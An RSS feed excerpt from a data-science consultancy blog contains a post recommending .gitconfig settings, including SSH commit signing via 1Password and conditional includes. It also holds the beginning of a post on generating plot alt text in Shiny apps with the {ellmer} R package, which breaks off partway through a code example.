&lt;a href = "https://www.jumpingrivers.com/blog/recommended-gitconfig/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/recommended-gitconfig/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Getting started with Git is easy (ha!), but once you&amp;rsquo;ve mastered the basics, it&amp;rsquo;s natural
for developers to start thinking about customising their git process.
Most Git settings live in the &lt;code&gt;.gitconfig&lt;/code&gt; file.
In this blog post, I&amp;rsquo;ll discuss what you should consider setting in your config file to make a more efficient development environment.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=recommended-gitconfig"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="adding-and-removing-variables"&gt;Adding and Removing Variables&lt;/h2&gt;
&lt;p&gt;You can edit your global &lt;code&gt;.gitconfig&lt;/code&gt; using any standard editor.
It should live in your home directory. If you have difficulty finding it, try&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;git config --edit --global
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="standard-settings"&gt;Standard Settings&lt;/h2&gt;
&lt;p&gt;These settings are probably(?) suitable for everyone.
First, your name and email address you use when committing&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;user]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;name = Colin Gillespie&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;email = colin@jumpingrivers.com&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;At Jumping Rivers, we enforce that the email address matches a particular pattern, (@jumpingrivers.com),
when committing to the corporate repo.
This standardises our internal commit history.
However, most people require a couple of identities - see the end of this post for details.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;core]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;excludesfile = ~/.gitignore&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;editor = emacs&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;excludesfile&lt;/code&gt; setting points to a global &lt;code&gt;.gitignore file&lt;/code&gt; and allows you to exclude files regardless of the project. My global ignore file is fairly light.
It contents file names, such as &lt;code&gt;.Rhistory&lt;/code&gt;, &lt;code&gt;^tmp\\.*&lt;/code&gt;, and &lt;code&gt;\.vscode&lt;/code&gt;, that I never want to commit.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;editor&lt;/code&gt; setting determines which text editor Git opens for commit messages and interactive operations.
I still cling to Emacs, but most people probably prefer other options are &lt;code&gt;vim&lt;/code&gt;, &lt;code&gt;nano&lt;/code&gt;, or &lt;code&gt;code --wait&lt;/code&gt; for Visual Studio Code.&lt;/p&gt;
&lt;p&gt;Enabling &lt;a href="https://git-scm.com/book/en/v2/Customizing-Git-Git-Configuration#_colors_in_git" rel="external"&gt;colour output&lt;/a&gt; makes Git&amp;rsquo;s terminal output more readable.
Different elements (additions, deletions, branch names, etc.) are highlighted in different colours, making it easier to scan and understand what&amp;rsquo;s happening at a glance.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;color]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;ui = 1&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Almost all of the repositories I deal with use &lt;code&gt;main&lt;/code&gt; for their default branch.
This can be set via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;init]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;defaultBranch = main&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Setting &lt;code&gt;pull.rebase = true&lt;/code&gt; makes &lt;code&gt;git pull&lt;/code&gt; rebase your local commits on top of the upstream changes rather than creating merge commits, resulting in a &lt;a href="https://www.atlassian.com/git/tutorials/merging-vs-rebasing" rel="external"&gt;cleaner history&lt;/a&gt; - but can be very annoying!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;pull]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;rebase = true&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;autoSetupRemote = true&lt;/code&gt; setting automatically sets up remote tracking when you push a &lt;a href="https://jvns.ca/blog/2024/02/16/popular-git-config-options/" rel="external"&gt;new branch&lt;/a&gt;, eliminating the need for &lt;code&gt;git push -u origin branch-name&lt;/code&gt; drama.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;push]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;default = simple&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# This is the default in modern Git versions&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;autoSetupRemote = true&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="branch-management"&gt;Branch Management&lt;/h2&gt;
&lt;p&gt;This setting changes how Git sorts branches when you run commands like &lt;code&gt;git branch&lt;/code&gt;.
By default, Git sorts branches alphabetically - but alphabetically is rarely useful for me.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;branch]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;sort = -committerdate&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="useful-aliases"&gt;Useful Aliases&lt;/h2&gt;
&lt;p&gt;You can also set git aliases&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;alias]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;root = rev-parse --show-toplevel&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;root&lt;/code&gt; &lt;a href="https://git-scm.com/docs/git-rev-parse" rel="external"&gt;alias&lt;/a&gt; provides quick access to the repository&amp;rsquo;s root directory - useful when you&amp;rsquo;re deep in a nested folder structure and need to reference files relative to the project root.
You can use it simply with &lt;code&gt;git root&lt;/code&gt;, which will output the absolute path to your repository&amp;rsquo;s top-level directory.&lt;/p&gt;
&lt;p&gt;I&amp;rsquo;ve also created a &lt;code&gt;zsh&lt;/code&gt; alias - &lt;code&gt;gcd&lt;/code&gt; that does this, as I found it really handy.&lt;/p&gt;
&lt;h2 id="security-settings"&gt;Security Settings&lt;/h2&gt;
&lt;p&gt;This section tackles the following problems&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We use ssh for checking out repositories&lt;/li&gt;
&lt;li&gt;The ssh key is stored securely and is Password protected, i.e. encrypted&lt;/li&gt;
&lt;li&gt;Git commits are signed&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Over the years, I&amp;rsquo;ve tried a few different methods, but as we (Jumping RIvers), use 1Password to manage credentials,
I want to use the same system.&lt;/p&gt;
&lt;p&gt;The ssh key is stored in 1Password.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;commit]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;gpgsign = true&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;[&lt;span style="color:#a5d6ff"&gt;user]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;signingkey = ssh-ed25519 ABCD&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;[&lt;span style="color:#a5d6ff"&gt;gpg]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;format = ssh&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;[&lt;span style="color:#a5d6ff"&gt;gpg &amp;#34;ssh&amp;#34;]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;program = &amp;#34;/opt/1Password/op-ssh-sign&amp;#34;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Commit signing verifies that commits genuinely come from you, which is increasingly important in professional environments.
This configuration uses SSH keys rather than traditional GPG keys (note the &lt;code&gt;format = ssh&lt;/code&gt; setting).
I&amp;rsquo;ve used GPG keys in the past, and they can be tricky.&lt;/p&gt;
&lt;p&gt;The configuration integrates with 1Password&amp;rsquo;s SSH agent, allowing seamless signing without managing separate GPG keys.
When you make a commit, 1Password handles the signing process automatically.
It also means, that you don&amp;rsquo;t have to constantly enter your password to decrypt your ssh key.&lt;/p&gt;
&lt;p&gt;Another feature of this set-up, is that it&amp;rsquo;s much easier to have multiple ssh keys, rather than
&amp;ldquo;one key to rule them all&amp;rdquo;.&lt;/p&gt;
&lt;h2 id="pack-optimisation"&gt;Pack Optimisation&lt;/h2&gt;
&lt;p&gt;This setting controls how aggressively Git compresses repository data.
A depth of 20 balances storage efficiency against the computational cost of packing and unpacking objects.
Lower values mean faster operations but larger repositories; higher values save space but slow down operations slightly.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;pack]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;depth = 20&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To be honest, this has been &amp;ldquo;stolen&amp;rdquo; from a long forgotten blog post/tweet/StackOverflow question.&lt;/p&gt;
&lt;h2 id="conditional-includes-for-workpersonal-separation"&gt;Conditional Includes for Work/Personal Separation&lt;/h2&gt;
&lt;p&gt;This, in my humble opinion, is an elegant solution for managing different Git identities.
When working in repositories under &lt;code&gt;/home/colin/jumpingrivers/&lt;/code&gt;, Git loads additional configuration from &lt;code&gt;.gitconfig-work&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;includeIf &amp;#34;gitdir:/home/colin/jumpingrivers/&amp;#34;]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;path = .gitconfig-work&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;.gitconfig-work&lt;/code&gt; file contains any new or updated variables, i.e.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;user]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;email = colin@jumpingrivers.com&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This is perfect for using different email addresses on different projects.&lt;/p&gt;
&lt;h2 id="putting-it-all-together"&gt;Putting It All Together&lt;/h2&gt;
&lt;p&gt;A well-configured &lt;code&gt;.gitconfig&lt;/code&gt; file transforms Git from a tool you fight with into one that works seamlessly with your workflow.
Avoid copying and pasting configuration options you don&amp;rsquo;t understand.
Instead, consider each change turn, and add to your &lt;code&gt;.gitconfig&lt;/code&gt; file.
Remember, you can view your current configuration at any time with &lt;code&gt;git config --list&lt;/code&gt; and edit it with &lt;code&gt;git config --global --edit&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/recommended-gitconfig/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Using {ellmer} for Dynamic Alt Text Generation in {shiny} Apps</title><link>https://www.jumpingrivers.com/blog/ellmer-dynamic-alt-text/</link><pubDate>Thu, 22 Jan 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/ellmer-dynamic-alt-text/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/ellmer-dynamic-alt-text/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/ellmer-dynamic-alt-text/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="alt-text"&gt;Alt Text&lt;/h2&gt;
&lt;p&gt;First things first, if you haven’t heard of or used alt text before, it
is a brief written description of an image that explains context and
purpose. It is used to improve accessibility by allowing screen readers
to describe images, or provide context if an image fails to load. For
writing good alt text see this article by
&lt;a href="https://accessibility.huit.harvard.edu/describe-content-images" rel="external"&gt;Havard&lt;/a&gt;,
but some good rules of thumb are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Keep it concise and relevant to the context of why the image is being
used.&lt;/li&gt;
&lt;li&gt;Screen reader will already say “Image of …” so we don’t need to
include this unless the style is important (drawing, cartoon etc).&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Join us for our AI in Production conference! For more details, check out our
&lt;a href="https://ai-in-production.jumpingrivers.com/"&gt;conference website!&lt;/a&gt;
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="alt-text-within-apps-and-dashboards"&gt;Alt Text within Apps and Dashboards&lt;/h2&gt;
&lt;p&gt;I don’t need to list the positives of interactive apps and dashboards,
however one of the main ones is interactivity and allowing users to
explore data in their own way. This is a great thing most of the time,
but one pitfall that is often overlooked is interactivity can overshadow
accessibility. Whether it’s a fancy widget that’s hard (or impossible)
to use via keyboard or interactive visualisations without meaningful
alternative text.&lt;/p&gt;
&lt;p&gt;In this post, we’ll look at a new approach to generating dynamic alt
text for ggplot2 charts using &lt;a href="https://ellmer.tidyverse.org/" rel="external"&gt;{ellmer}&lt;/a&gt;,
Posit’s new R package for querying large language models (LLM) from R.
If you are using Shiny for Python then
&lt;a href="https://github.com/posit-dev/chatlas" rel="external"&gt;chatlas&lt;/a&gt; will be of interest to
you.&lt;/p&gt;
&lt;h2 id="why-dynamic-alt-text-needs-care"&gt;Why Dynamic Alt Text Needs Care&lt;/h2&gt;
&lt;p&gt;Automatically generating alt text is appealing, but production Shiny
apps have constraints:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Plots may re-render frequently&lt;/li&gt;
&lt;li&gt;API calls can fail or be rate-limited&lt;/li&gt;
&lt;li&gt;Accessibility should degrade gracefully, not break the app&lt;/li&gt;
&lt;li&gt;A good implementation should be consistent, fault-tolerant, and cheap
to run.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="using-ellmer-in-a-shiny-app"&gt;Using {ellmer} in a Shiny App&lt;/h2&gt;
&lt;p&gt;The first step is setting up a connection to your chosen LLM, I am using
Google Gemini Flash-2.5 as there is a generous free tier but other model
and providers are available. In a Shiny app, this can done outside the
reactive context:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(ellmer)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;gemini &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;chat_google_gemini&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## Using model = &amp;quot;gemini-2.5-flash&amp;quot;.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Note: You should have a Google Gemini key saved in you .Renviron file as
&lt;code&gt;GEMINI_API_KEY&lt;/code&gt;, this way the {ellmer} function will be able to find
it. More information on generating a Gemini API key can be found, in the
&lt;a href="https://ai.google.dev/gemini-api/docs/api-key" rel="external"&gt;Gemini docs&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Then we have the function for generating the alt text:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(ggplot2)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;generate_alt_text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(ggplot_obj, model) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; temp &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tempfile&lt;/span&gt;(fileext &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;.png&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;on.exit&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unlink&lt;/span&gt;(temp))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggsave&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; temp,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ggplot_obj,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dpi &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;150&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tryCatch&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; model&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;chat&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;Generate concise alt text for this plot image.
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;Describe the chart type, variables shown,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;key patterns or trends, and value ranges where visible.
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; &amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;content_image_file&lt;/span&gt;(temp)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; error &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(e) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Data visualisation showing trends and comparisons.&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
